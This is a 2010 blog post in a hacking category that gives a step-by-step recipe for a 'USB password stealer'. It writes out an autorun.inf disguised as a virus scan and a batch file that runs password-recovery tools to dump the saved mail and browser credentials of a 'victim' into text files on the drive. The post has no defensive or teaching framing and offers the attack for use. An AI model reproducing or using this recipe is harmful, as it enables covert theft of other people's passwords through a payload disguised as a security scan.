Usb Password Stealer

Posted: June 23, 2010 in Hacking & Security

Many people save their passwords in their Browser and windows. As we know that there are lots of tools available on internet to recover Saved passwords, Thus one can easily run those software at victim’s computer and get their’s passwords. With the help of USB Passwords Stealer one can easily steal that saved passwords from victim’s computer.

Requirements:

Password recovery software:

1. Mail PassView – Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc
2. IE Passview – IE passview is a small program that helps us view stored passwords in Internet explorer.
3. Protected storage pass viewer(PSPV) – Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.
4. Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox.

Steps:

1. Download all these tools and copy their exe files (mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe) into your USB Drive.

2. Open notepad and write the following command into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save this file as autorun.inf and copy it into your USB drive.

3. Open another notepad and write the following command into it.
@echo off
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

save this file as launch.bat and copy it into your USB drive.

4. Its done now insert it in victims computer and this will save password in .txt files for you.

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